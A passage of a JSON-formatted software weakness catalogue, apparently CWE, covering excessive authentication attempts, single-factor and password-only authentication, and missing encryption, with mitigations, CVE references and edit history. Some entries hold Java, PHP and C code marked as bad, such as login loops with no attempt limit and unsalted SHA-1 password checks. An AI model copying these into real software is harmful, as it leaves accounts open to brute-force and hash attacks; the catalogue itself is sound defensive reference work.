attacker could perform an arbitrary number of authentication attempts using different passwords, and eventually gain access to the targeted account."}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Forced Path Execution"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Common protection mechanisms include:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Disconnecting the user after a small number of failed attempts","Implementing a timeout","Locking out a targeted account","Requiring a computational task on the user\'s part."]}}}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45]"]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-117"},"Intro_Text":"In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts. The attacker targeted a member of Twitter\'s support team and was able to successfully guess the member\'s password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-236"}}}},{"Intro_Text":"The following code, extracted from a servlet\'s doPost() method, performs an authentication lookup every time the servlet is invoked.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String username = request.getParameter(\\"username\\");String password = request.getParameter(\\"password\\");int authResult = authenticateUser(username, password);","xhtml:br":["","",""]}},"Body_Text":"However, the software makes no attempt to restrict excessive authentication attempts."},{"Intro_Text":"This code attempts to limit the number of login attempts by causing the process to sleep before completing the authentication.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = $_POST[\'username\'];$password = $_POST[\'password\'];sleep(2000);$isAuthenticated = authenticateUser($username, $password);","xhtml:br":["","",""]}},"Body_Text":"However, there is no limit on parallel connections, so this does not increase the amount of time an attacker needs to complete an attack."},{"Intro_Text":"In the following C/C++ example the validateUser method opens a socket connection, reads a username and password from the socket and attempts to authenticate the username and password.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int validateUser(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int socket = openSocketConnection(host, port);if (socket < 0) {}int isValidUser = 0;char username[USERNAME_SIZE];char password[PASSWORD_SIZE];while (isValidUser == 0) {}return(SUCCESS);","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open socket connection\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {}","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}}}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int validateUser(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...int count = 0;while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) {}if (isValidUser) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {}count++;","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}},"xhtml:br":""}},{"#text":"return(SUCCESS);","attr":{"@_style":"margin-left:10px;"}},{"#text":"return(FAIL);","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"The validateUser method will continuously check for a valid username and password without any restriction on the number of authentication attempts made. The method should limit the number of authentication attempts made to prevent brute force attacks as in the following example code."},{"Intro_Text":"Consider this example from a\\n\\t\\t real-world attack against the iPhone\\n\\t\\t [REF-1218]. An attacker can use brute force\\n\\t\\t methods; each time there is a failed guess, the\\n\\t\\t attacker quickly cuts the power before the failed\\n\\t\\t entry is recorded, effectively bypassing the\\n\\t\\t intended limit on the number of failed\\n\\t\\t authentication attempts. Note that this attack\\n\\t\\t requires removal of the cell phone battery and\\n\\t\\t connecting directly to the phone\'s power source,\\n\\t\\t and the brute force attack is still\\n\\t\\t time-consuming."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1152","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1152"},{"Reference":"CVE-2001-1291","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1291"},{"Reference":"CVE-2001-0395","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0395"},{"Reference":"CVE-2001-1339","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1339"},{"Reference":"CVE-2002-0628","Description":"Product does not disconnect or timeout after multiple failed logins.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0628"},{"Reference":"CVE-1999-1324","Description":"User accounts not disabled when they exceed a threshold; possibly a resultant problem.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1324"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_ID":"AUTHENT.MULTFAIL","Entry_Name":"Multiple Failed Authentication Attempts not Prevented"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP34","Entry_Name":"Unrestricted authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-1218"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":[{"#text":"Multiple Failed Authentication Attempts not Prevented","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Restrict Excessive Authentication Attempts","attr":{"@_Date":"2010-02-16"}}]}},"308":{"attr":{"@_ID":"308","@_Name":"Use of Single-factor Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme.","Extended_Description":"While the use of multiple authentication schemes is simply piling on more complexity on top of authentication, it is inestimably valuable to have such measures of redundancy. The use of weak, reused, and common passwords is rampant on the internet. Without the added protection of multiple authentication schemes, a single mistake can result in the compromise of an account. For this reason, if multiple schemes are possible and also easy to use, they should be implemented and required.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"654","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"309","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If the secret in a single-factor authentication scheme gets compromised, full authentication is possible."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use multiple independent authentication schemes, which ensures that -- if one of the methods is compromised -- the system itself is still likely safe from compromise."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using single-factor authentication"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"645"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Using Single-factor Authentication","attr":{"@_Date":"2008-04-11"}}}},"309":{"attr":{"@_ID":"309","@_Name":"Use of Password System for Primary Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"654","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"308","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Password systems are the simplest and most ubiquitous authentication mechanisms. However, they are subject to such well known attacks,and such frequent compromise that their use in the most simple implementation is not practical."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"A password authentication mechanism error will almost always result in attackers being authorized as valid users."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"In order to protect password systems from compromise, the following should be noted:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Passwords should be stored safely to prevent insider attack and to ensure that -- if a system is compromised -- the passwords are not retrievable. Due to password reuse, this information may be useful in the compromise of other systems these users work with. In order to protect these passwords, they should be stored encrypted, in a non-reversible state, such that the original text password cannot be extracted from the stored value.","Password aging should be strictly enforced to ensure that passwords do not remain unchanged for long periods of time. The longer a password remains in use, the higher the probability that it has been compromised. For this reason, passwords should require refreshing periodically, and users should be informed of the risk of passwords which remain in use for too long.","Password strength should be enforced intelligently. Rather than restrict passwords to specific content, or specific length, users should be encouraged to use upper and lower case letters, numbers, and symbols in their passwords. The system should also ensure that no passwords are derived from dictionary words."]}}}},{"Phase":"Architecture and Design","Description":"Use a zero-knowledge password protocol, such as SRP."},{"Phase":"Architecture and Design","Description":"Ensure that passwords are stored safely and are not reversible."},{"Phase":"Architecture and Design","Description":"Implement password aging functionality that requires passwords be changed after a certain point."},{"Phase":"Architecture and Design","Description":"Use a mechanism for determining the strength of a password and notify the user of weak password use."},{"Phase":"Architecture and Design","Description":"Inform the user of why password protections are in place, how they work to protect data integrity, and why it is important to heed their warnings."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using password systems"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Using Password Systems","attr":{"@_Date":"2008-04-11"}}}},"311":{"attr":{"@_ID":"311","@_Name":"Missing Encryption of Sensitive Data","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not encrypt sensitive or critical information before storage or transmission.","Extended_Description":"The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the application does not use a secure channel, such as SSL, to exchange sensitive information, it is possible for an attacker with access to the network traffic to sniff packets from the connection and uncover the data. This attack is not technically difficult, but does require physical access to some portion of the network over which the sensitive data travels. This access is usually somewhere near where the user is connected to the network (such as a colleague on the company network) but can be anywhere along the path from the user to the end server."},{"Scope":["Confidentiality","Integrity"],"Impact":"Modify Application Data","Note":"Omitting the use of encryption in any program which transfers data over a network of any kind should be considered on par with delivering the data sent to each user on the local networks of both the sender and receiver. Worse, this omission allows for the injection of data into a stream of communication between two parties -- with no means for the victims to separate valid data from invalid. In this day of widespread network attacks and password collection sniffers, it is an unnecessary risk to omit encryption from the design of any system which might benefit from it."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"The characterizaton of sensitive data often requires domain-specific understanding, so manual methods are useful. However, manual efforts might not achieve desired code coverage within limited time constraints. Black box methods may produce artifacts (e.g. stored data or unencrypted network transfer) that require manual evaluation.","Effectiveness":"High"},{"Method":"Automated Analysis","Description":"Automated measurement of the entropy of an input/output source may indicate the use or lack of encryption, but human analysis is still required to distinguish intentionally-unencrypted data (e.g. metadata) from sensitive data."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Network Sniffer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Man-in-the-middle attack tool"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Clearly specify which data or resources are valuable enough that they should be protected by encryption. Require that any transmission or storage of this data/resource should use well-vetted encryption algorithms."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Ensure that encryption is properly integrated into the system design, including but not necessarily limited to:","Identify the separate needs and contexts for encryption:","Using threat modeling or other techniques, assume that data can be compromised through a separate vulnerability or weakness, and determine where encryption will be most effective. Ensure that data that should be private is not being inadvertently exposed using weaknesses such as insecure permissions (CWE-732). [REF-7]"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Encryption that is needed to store or transmit private data of the users of the system","Encryption that is needed to protect the system itself from unauthorized disclosure or 